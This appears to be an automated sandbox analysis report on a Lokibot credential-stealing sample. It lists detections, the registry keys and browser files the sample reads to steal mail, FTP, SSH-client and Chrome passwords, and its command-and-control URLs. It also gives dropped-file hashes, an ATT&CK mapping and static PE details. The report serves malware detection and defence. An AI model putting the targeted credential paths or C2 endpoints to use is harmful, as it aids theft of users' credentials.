Source: Yara match | File source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: U001P56ybm.exe PID: 4640, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: U001P56ybm.exe PID: 5684, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\U001P56ybm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\U001P56ybm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\U001P56ybm.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\U001P56ybm.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\U001P56ybm.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\U001P56ybm.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\U001P56ybm.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\U001P56ybm.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: PopPassword 2_2_0040D069
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: SmtpPassword 2_2_0040D069
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: PopPassword 2_1_0040D069
Source: C:\Users\user\Desktop\U001P56ybm.exe | Code function: SmtpPassword 2_1_0040D069
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\U001P56ybm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY

              Remote Access Functionality:

Yara detected Lokibot
Source: Yara match | File source: 00000002.00000002.544999471.00000000005D8000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: U001P56ybm.exe PID: 4640, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: U001P56ybm.exe PID: 5684, type: MEMORYSTR

              Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Path Interception | Access Token Manipulation 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping 2 | Account Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 112 | Obfuscated Files or Information 2 | Credentials in Registry 2 | File and Directory Discovery 2 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 1 | Security Account Manager | System Information Discovery 15 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading 1 | NTDS | Security Software Discovery 13 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Application Layer Protocol 111 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 11 | LSA Secrets | Process Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | System Owner/User Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

              Behavior Graph

              Screenshots


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner | Label
U001P56ybm.exe | 25% | ReversingLabs | Win32.Trojan.Nsisx

              Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll | 23% | ReversingLabs | Win32.Trojan.Tedy

              Unpacked PE Files

Source | Detection | Scanner | Label
2.0.U001P56ybm.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.2.U001P56ybm.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.U001P56ybm.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
2.0.U001P56ybm.exe.400000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.U001P56ybm.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.U001P56ybm.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.2.U001P56ybm.exe.2430000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.U001P56ybm.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.0.U001P56ybm.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
2.1.U001P56ybm.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

              Domains

              No Antivirus matches

              URLs

Source | Detection | Scanner | Label
http://194.85.248.167/imt/fre.php | 100% | Avira URL Cloud | malware
http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://194.85.248.167/imt/fre.php | true | Avira URL Cloud: malware | unknown
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://nsis.sf.net/NSIS_Error | U001P56ybm.exe | false | | high
http://nsis.sf.net/NSIS_ErrorError | U001P56ybm.exe | false | | high
http://www.ibsensoftware.com/ | U001P56ybm.exe, U001P56ybm.exe, 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, U001P56ybm.exe, 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown

                  Contacted IPs


                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
194.85.248.167 | unknown | Russian Federation | 35478 | DATACENTERRO | true

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:528740
                  Start date:25.11.2021
                  Start time:18:21:15
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 41s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:U001P56ybm.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:22
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/4@0/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 63.3% (good quality ratio 61.1%)
                  • Quality average: 78.7%
                  • Quality standard deviation: 27.6%
                  HCA Information:
                  • Successful, ratio: 95%
                  • Number of executed functions: 54
                  • Number of non-executed functions: 66
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/528740/sample/U001P56ybm.exe

                  Simulations

                  Behavior and APIs

Time | Type | Description
18:22:21 | API Interceptor | 48x Sleep call for process: U001P56ybm.exe modified

                  Joe Sandbox View / Context

                  IPs

Match | Associated Sample Name / URL | Detection | Context
194.85.248.167 | xA7ry4Ewuk.exe | malicious | 194.85.248.167/imt/fre.php

                  Domains

                  No context

                  ASN

Match | Associated Sample Name / URL | Detection | Context
DATACENTERRO | mtSgtqMMFl.exe | malicious | 194.85.248.229
DATACENTERRO | W7UbgU8x18.exe | malicious | 194.85.248.219
DATACENTERRO | SK TAX INV.exe | malicious | 194.85.248.250
DATACENTERRO | xA7ry4Ewuk.exe | malicious | 194.85.248.167
DATACENTERRO | Sales Pro forma invoice_SO0005303101427.docx | malicious | 194.85.248.219
DATACENTERRO | Statement from QNB.exe | malicious | 194.85.248.156
DATACENTERRO | CV.exe | malicious | 194.85.248.250
DATACENTERRO | INV.exe | malicious | 194.85.248.250
DATACENTERRO | CV.exe | malicious | 194.85.248.250
DATACENTERRO | TMR590241368.exe | malicious | 194.85.248.115
DATACENTERRO | vIyyHkRXJn | malicious | 194.85.250.154
DATACENTERRO | 267A80yAhp | malicious | 194.85.250.154
DATACENTERRO | QJYxAALd23 | malicious | 194.85.250.154
DATACENTERRO | z4bJfjXDDQ | malicious | 194.85.250.154
DATACENTERRO | XXaLHoecGp | malicious | 194.85.250.154
DATACENTERRO | AGiCic4uDz | malicious | 194.85.250.154
DATACENTERRO | 3B3BMxYG8n | malicious | 194.85.250.154
DATACENTERRO | 6WMo1OYmk3 | malicious | 194.85.250.154
DATACENTERRO | dycuTng5W8 | malicious | 194.85.250.154
DATACENTERRO | xINX4f5M8s | malicious | 194.85.250.154

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\9bx9q99412rjuw5u
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):217431
                  Entropy (8bit):7.987953901401436
                  Encrypted:false
                  SSDEEP:6144:/KdbhrnUV0fmvApS9oPiEPS3nwOJ2WF9WjNZHq98e2:/crneIEKqN2GWj3r
                  MD5:1B63DA395BAFC5116F3F6FF8AAD7A350
                  SHA1:372869F185066FED68D1573158761EB4859459DB
                  SHA-256:19D7869C47AF19341916AE58B2F82536CF130942C05DFEE3092C65CD0C9E897B
                  SHA-512:E9D93E22D5D4C547A80ACF658C4F2A6409CD00E88F73602789FEED597BEBB6073EEDDBE6A4439C3EC11A26C9EE5D9FF341BB1F8888BFEA751DFA7921E8FA5714
                  Malicious:false
                  Reputation:low
                  Preview: q.........Vl:....m.G.g...0.?#....P....`ZmNwW]&.?..s.........3J.I....".5...W....]A..&..yu....<..WP..........'g..$E...RU.`x.K.mlo.....|..t(Z.JV 4.....q..%M..h..H@]...C.0......2. )=I....n..LX.A..^.x....~!+q...6..J.6..Y.R..q.)4."..+.B.x>..R.,.d...4.<.".Vz0V.O..:...G.g..i0..#....P....`.mNw*]&j?..s...&.n.D.3J..\..`......$....v..'.,...I........o.)....z#..BL9R._..E...RU.]........p........M.i............^....!l2...o+Z...i...4.....e.{....G.B..nH.M..A.Z..c\.T..D....=g.;S.h."....B<.'...&.,.d...4.u....V'...d....g..j.0......P....`ZmNwW]&.?..{....t.b.3J.!X.....:..9. ....v..'.,...].+...o.)....z..a.`9.....E...RU.]......}...p........M.i............^....!l2...o+Z...i...4.....e.{...r.....nH.M..A.Z..c\.T..D....=g..q.)4.".0..B<.'.....,.d...4.u....V....:.m.G.g..0.?#....P....`ZmNwW]&.?..s.......D.3J.....q.....9$.....v..'.,..I........o.)....z#.a.`9.._..E...RU.]........p........M.i............^....!l2...o+Z...i...4.....e.{...r.....nH.M..A.Z..c\.T..D....=g.
                  C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):120320
                  Entropy (8bit):6.283877419444271
                  Encrypted:false
                  SSDEEP:1536:DkJ/CJk6kcjZwfqMkzLaRJ+cxfNdtTisu01vzG4CNrutUo7HC5mo5wTIDLmUleNg:c6+sz2+cjdx1lmNE7i5IIXRlCi3nJ
                  MD5:7464D22DB87D13EBEF8364866100E33C
                  SHA1:6A64B31B7EE5F853A1CC142D0B3300A796D21B28
                  SHA-256:8142F4110C4DAF020DF138E7A281FD19A3295AF855D7527177E5DAB204EE9D8F
                  SHA-512:E7366C3617B958B3A4FA55548DCE997BD335D7B871494154BA9BDFD077B4C2488D80C9EA571D171B3CCFC18A579ECE85E76AE54C14AF33306BB50AB48BF32631
                  Malicious:true
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 23%
                  Reputation:low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0.Px^.Px^.Px^....Qx^.]*..px^.]*.._x^.]*..:x^.D.X.Rx^.D.Z.Sx^.D._.Ix^.Px_..x^..&Z.Qx^..&^.Qx^..&..Qx^..&\.Qx^.RichPx^.........PE..L......a...........!.....j...h............................................... ..........................................L...............................................................................@............................................text...dh.......j.................. ..`.bss....D................................rdata..FN.......P...n..............@..@.data...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview: 1
                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                  Process:C:\Users\user\Desktop\U001P56ybm.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):46
                  Entropy (8bit):1.0424600748477153
                  Encrypted:false
                  SSDEEP:3:/lbON:u
                  MD5:89CA7E02D8B79ED50986F098D5686EC9
                  SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                  SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                  SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: ........................................user.

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Entropy (8bit):7.929625872337307
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 92.16%
                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:U001P56ybm.exe
                  File size:301040
                  MD5:969e2ccfcacf3573de922d9bce81e3fd
                  SHA1:c3dd33a00d4dad9330d0c2dbc0c3b75396c70f8b
                  SHA256:4a059628d9f56799d68937821b355477502fe0704d41a75c372b1c036061d59f
                  SHA512:9a8e5104bc18ac2bb0987324ce0f602b26ee4435da9d8c869516052067b6d911e4cec839a5619553d15129b6652c75fa489710eca815496b688e25cfeced65bf
                  SSDEEP:6144:rGiOg+450MRKEIC/ICcr8Cnvvso/Y9oPiEPS3nwOJ2YF9WjNZHqo8eXzo9:P5vRYMICasowKqN24Wj3ro9
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                  File Icon

                  Icon Hash:b2a88c96b2ca6a72

                  Static PE Info

                  General

                  Entrypoint:0x4030e3
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:7fa974366048f9c551ef45714595665e

                  Entrypoint Preview

                  Instruction
                  sub esp, 00000180h
                  push ebx
                  push ebp
                  push esi
                  xor ebx, ebx
                  push edi
                  mov dword ptr [esp+18h], ebx
                  mov dword ptr [esp+10h], 00409158h
                  xor esi, esi
                  mov byte ptr [esp+14h], 00000020h
                  call dword ptr [00407030h]
                  push 00008001h
                  call dword ptr [004070B0h]
                  push ebx
                  call dword ptr [0040727Ch]
                  push 00000008h
                  mov dword ptr [0042EC18h], eax
                  call 00007FD554597328h
                  mov dword ptr [0042EB64h], eax
                  push ebx
                  lea eax, dword ptr [esp+34h]
                  push 00000160h
                  push eax
                  push ebx
                  push 00428F90h
                  call dword ptr [00407158h]
                  push 0040914Ch
                  push 0042E360h
                  call 00007FD554596FDFh
                  call dword ptr [004070ACh]
                  mov edi, 00434000h
                  push eax
                  push edi
                  call 00007FD554596FCDh
                  push ebx
                  call dword ptr [0040710Ch]
                  cmp byte ptr [00434000h], 00000022h
                  mov dword ptr [0042EB60h], eax
                  mov eax, edi
                  jne 00007FD55459480Ch
                  mov byte ptr [esp+14h], 00000022h
                  mov eax, 00434001h
                  push dword ptr [esp+14h]
                  push eax
                  call 00007FD554596AC0h
                  push eax
                  call dword ptr [0040721Ch]
                  mov dword ptr [esp+1Ch], eax
                  jmp 00007FD554594865h
                  cmp cl, 00000020h
                  jne 00007FD554594808h
                  inc eax
                  cmp byte ptr [eax], 00000020h
                  je 00007FD5545947FCh
                  cmp byte ptr [eax], 00000022h
                  mov byte ptr [eax+eax+00h], 00000000h

                  Rich Headers

                  Programming Language:
                  • [EXP] VC++ 6.0 SP5 build 8804

                  Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74b0 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x900 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 

                  Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5b68 | 0x5c00 | False | 0.67722486413 | data | 6.48746502716 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x129c | 0x1400 | False | 0.4337890625 | data | 5.04904254867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x25c58 | 0x400 | False | 0.58203125 | data | 4.76995537906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x37000 | 0x900 | 0xa00 | False | 0.4078125 | data | 3.93441125971 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x37190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x37478 | 0x100 | data | English | United States
RT_DIALOG | 0x37578 | 0x11c | data | English | United States
RT_DIALOG | 0x37698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x376f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x37710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                  Imports

DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
